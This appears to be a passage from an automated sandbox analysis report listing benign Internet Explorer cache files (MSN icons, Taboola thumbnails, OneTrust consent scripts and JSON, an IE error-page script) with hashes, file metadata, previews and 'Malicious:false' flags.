                                                                                                                                                                                                                                        SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                        SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cfdbd9[1].png
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):740
                                                                                                                                                                                                                                        Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                        MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                        SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                        SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                        SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                                                        Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[1].json
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):74702
                                                                                                                                                                                                                                        Entropy (8bit):5.345294167813595
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:hVAyLXfhINb6yvz6Ix1wTpCUVkhB1Ct4AityQ1NEDEEvCDcRiZfWUcU5Jfoc:hVhEvxaEC+biAEv3RiEkz
                                                                                                                                                                                                                                        MD5:754F6C92A735B47A2CC5E7D03C2102D1
                                                                                                                                                                                                                                        SHA1:71DDB35ED5E57812B895A939C77A0196B538AF40
                                                                                                                                                                                                                                        SHA-256:491BF15460B5FEF7B972E48841BACADA7549A01CA52E46297E9F91B2E978132D
                                                                                                                                                                                                                                        SHA-512:D3A859DBB25BA28D0401428A6C68B87F0BE3825DAA773B161A86D33164846FF67ADD99FD4A1CF3CA4613293DD2F629C5CE2E9A3E6E8A7C796A361F02CEFA3C68
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                                                        Preview: {"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir teilen diese Informationen mit unseren Partnern auf der Grundlage einer Einwilligung und berechtigter Interessen. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=521839","H
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):12105
                                                                                                                                                                                                                                        Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                                        MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                                                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_0bc8e4a63bc36f416f65b3f588f32f9a[1].jpg
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15106
                                                                                                                                                                                                                                        Entropy (8bit):7.969484552048386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:0vOPQM6ukP0V2XI3wi4z9BChauZz2LSulN:hQM6uxVnY0auZz7ulN
                                                                                                                                                                                                                                        MD5:4D5E13D69FF33A12FA3AC2CB60087B38
                                                                                                                                                                                                                                        SHA1:AA8A7E2731EDA4A10C59A7C67D156658FB7B3315
                                                                                                                                                                                                                                        SHA-256:9A9B37990C507A39A41E9E8A0B755AF787EC39F40EBD1B982C3F60F3460BB4C5
                                                                                                                                                                                                                                        SHA-512:81AE9F44609A99150D36B532B4B9AA04177D639D4820B1A353AF5F3FDCCA0D443C8E44A2713BA2A3271DB5D19FA80080107CB2A0DD01A72BF25CC5A9D8CC2E34
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0bc8e4a63bc36f416f65b3f588f32f9a.jpg
                                                                                                                                                                                                                                        Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici..........................!#!#!.F+3++3+F>K=9=K>oWMMWo.kfk................7...............3..................................................................P..*.....(".8..VW..;&$.d....f......O*.o.tz.eG..fF.H.....$.)..l.-..=.._.j......*....H.bCm.h[.k.z.5MAg5I.T).^eb..[.6..!.A.N9.Q&...XU.VB...4...IX..k?d..j..{Yt..L.$..].....j.,..$..SU.59...z..*.iMH...Q...e...$.xB....._nz.t....N._.]...tn.....6..SXR.Q...:f.%.....S..t...F...W.)YW,..~..K.fiz.q].9{I...F...dh..z..P....E.A.C..U9....S...]...C..t.CR.Ik-Zz."I...tLOP..~+G..N.q....:d].....h(*nx.Q.#....w...gVB.V.65.....x..d..O*.:.W.{QBQ*.......@.z.d.t..[.G..=...3...%z..W.}~f......M.6z....Z ...N..sP....Yejp..<jz..2.......J.^W.A`}&[...j5O..Y.GZD...T.t.VF.:M.rY...@E.H3..@9...T}..K1..RO(l:.%K..|.e31%....eA.Sb..o..d*"t..CQ)..._'....l...W .0-.z. V...4..Y..;B...."Atf=V......AE.4J...S.i.U...yU.......!..m'=..w..PseJS9q=!T*P.S.
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_IBK_542734683__zTLH6vUV[1].jpg
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):10756
                                                                                                                                                                                                                                        Entropy (8bit):7.874559132162376
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:7GTO3wp9l4oI1TRI+K1M7FVm5jlzvos0FhWTD91+yiqFx3k3F7HZqTrf8j:KTOAp39I1T++G0Ql8smgDfpFG3x56fO
                                                                                                                                                                                                                                        MD5:530961F46738BB75E8A8C20EF3AC7B8B
                                                                                                                                                                                                                                        SHA1:55700ED468D4224871D9A0036CFEA0A82BFEAB2C
                                                                                                                                                                                                                                        SHA-256:6B99E6FDA79FFB376A6933803895517BFA1ECCCC159F7D9ABAC0D9E300CF06E4
                                                                                                                                                                                                                                        SHA-512:487F1A8AC644944E5AD87768743955FFAC05DE23A4F9F6C3C0D6BF28EBB601695407112C55386418DBFBE1C554828E981B32AA58AF7190D9DAE1363D0D3B015C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__zTLH6vUV.jpg
                                                                                                                                                                                                                                        Preview: ......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.....................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........3...............................................................Q.N.(......J....Ic.A$.'_....h.a..5..Ug..J(:....(.}.=...i.)&.H{.DA$.".....l..o.k..}E)lt.,....8..+.X.l../iG,..)e.8{.DC$.".np0L..&...ib6..R..\M%...`.#-..d^.3.7r..IQ..H.......6..
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_IBK_606910635__VqZNjsRU[1].jpg
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):8977
                                                                                                                                                                                                                                        Entropy (8bit):7.947479110101718
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:6WrMcvUSzHvTwhK1b1vf9ZZXlZ/XFvMWUsH/WEqfkNGEy4Yr:6HcvTzsKd19/Xl9lj3WEVGEy4q
                                                                                                                                                                                                                                        MD5:C4931E6BBCB5E90E5EC143703BD2F152
                                                                                                                                                                                                                                        SHA1:E4125F6F6032BDD229222C7C906EE1DCF8EAFE48
                                                                                                                                                                                                                                        SHA-256:F559E194A2F4A3AABF0882D74E5B3B253065FF4C40CC029D11A0F1157382BA2F
                                                                                                                                                                                                                                        SHA-512:76A79AE3BCEC3F764AFB31020819CF464F4531416D11BC60CB406CC996985E23D7416A29C8398D5CEA7770B20EBFF673E97DC3FBDC9F9D94EEDF22E0E780ED41
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F606910635__VqZNjsRU.jpg
                                                                                                                                                                                                                                        Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........3................................................................. ....h$.Z.+...)Q.Ix'u.......@..pa.pS..Y.%V[+5Q.x..VZ.c..u".W......O..T....UGYB.YB%{.c.9Z.q..a....R>..s.6.....n..<f.}.-..[....+.F..D.:!YT.e.%.?A........8C...........o.F.....@.aY.+.e!Yd...qQ.".}.e..y\...<....f-u.`0CC;y.....l,T...^..#.r.6.v.\.6..}@.'c.yd........OX...J...+....[...0....ZHR[2S|L...4.,.g...U...3tvL.].("U{....=..k.O...mtJ.x.N..j..$njz...k..m.v......=n......_*.;]....+.....r..>V:N....2.R..E.v..<....s.\.{.|X........<*GK.P,.V>u {.N...%....._yx2T..._D.'.....m...<..Y.....NH.......xI......u}.Q.....V?`.=....8h.13../Vih..?&...:..Y,E7>b......Z.,e.E..k...M...s.f\..1~..}.3.q....i<.._.bJ=<...Nb....x$..A....b....k...me... J.!r...A~qO..j.......$..7-........,......OF.,..g....1...].ka....1l2r...T~....@...aj9r..<
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_c24ca6b8659c6ec7619917d208a75545[1].jpg
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):11030
                                                                                                                                                                                                                                        Entropy (8bit):7.955246213590514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:/8R+zKj5gmGQPh5fpLIOxpBwRrF/+1hh0dgmIg98GG1eIl1tuqEex:/8R+zKjZPh5dIOxpEZ/+1hhg2Ww11/aQ
                                                                                                                                                                                                                                        MD5:2369EE33407FDB57C013C1E4BBA472E0
                                                                                                                                                                                                                                        SHA1:ADE170C5A36141CD81E5FA42C9E26DD5A4B12DBD
                                                                                                                                                                                                                                        SHA-256:D4BC8A5EC8F19FF4CD360254F25B172CF3FAE372339FE96C5AE78A7825F92FC1
                                                                                                                                                                                                                                        SHA-512:8E593136871616E3405554D57CEAF758A9763F9A61167950E5A53371B6AD777496F3E7A51E2F077E1031129BFA948844116769CBF96AB88E80820D2433CD60E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc24ca6b8659c6ec7619917d208a75545.jpg
                                                                                                                                                                                                                                        Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......7...."..........3................................................................ ....2...;V.....B..t.+....^.....Ni/P@w/.E..J..-U.5[.....~ko.....w~a..[lo%..<.W..+.*}.X.UC.".S.....W.oTe>...r.....k`..u}.......|..MxVTS8..X`..\.s......j:.BT...T..+E.K}a...>....G.EzuR.........Yt...4-ir.-d...x.....Ri&....-)..6....<.].....lT...b...&aw.....$WaT..$.Z....-..Ui5.......W.............X..u...sW.R;..*..b.!O......K..t&.}Z....r.....a..H..R/l.I.|K.....o.....d..\-..'.$U2+..?.|.c^......+.....F.fi...\...i......|.>0n...N...]&.gp.@..H..gs\..%.R+..#..2..g~..o.h...[...7.o......N.C.N{Q2c..;..u.#.."..i...Qy.RgZ.p.$.a..#.%.........O....z..^.;Kc(J..a..9.cz.m.......|..5..G<K....d|..l".`..V..|.U..=.aO.I...6-....L........+.4......#.NN....G$B..Y...F.,...$..h.(Usi.:...u.....F..:.Ap...M.*x..yF.W...D.1.Q..!.VDs.>d.Qf.l......
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):180232
                                                                                                                                                                                                                                        Entropy (8bit):5.115010741936028
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
                                                                                                                                                                                                                                        MD5:EC3D53697497B516D3A5764E2C2D2355
                                                                                                                                                                                                                                        SHA1:0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
                                                                                                                                                                                                                                        SHA-256:2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
                                                                                                                                                                                                                                        SHA-512:CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                                                                        Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otFlat[1].json
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):12588
                                                                                                                                                                                                                                        Entropy (8bit):5.376121346695897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
                                                                                                                                                                                                                                        MD5:AF6480CC2AD894E536028F3FDB3633D7
                                                                                                                                                                                                                                        SHA1:EA42290413E2E9E0B2647284C4BC03742C9F9048
                                                                                                                                                                                                                                        SHA-256:CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
                                                                                                                                                                                                                                        SHA-512:A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
                                                                                                                                                                                                                                        Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otSDKStub[1].js
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):12814
                                                                                                                                                                                                                                        Entropy (8bit):5.302802185296012
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:pQp/Oc/tyWocJgjgh7kjj3Uz5BpHfkmZqWov:+RbJgjjjaXHfkmvov
                                                                                                                                                                                                                                        MD5:EACEA3C30F1EDAD40E3653FD20EC3053
                                                                                                                                                                                                                                        SHA1:3B4B08F838365110B74350EBC1BEE69712209A3B
                                                                                                                                                                                                                                        SHA-256:58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
                                                                                                                                                                                                                                        SHA-512:6E30018933A65EE19E0C5479A76053DE91E5C905DA800DFA7D0DB2475C9766B632F91DE8CC9BD6B90C2FBC4861B50879811EE43D465E5C5434943586B1CC47F1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
                                                                                                                                                                                                                                        Preview: var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBannerSDKDependency=function(
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otTCF-ie[1].js
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):102879
                                                                                                                                                                                                                                        Entropy (8bit):5.311489377663803
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                                                        MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                                                        SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                                                        SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                                                        SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
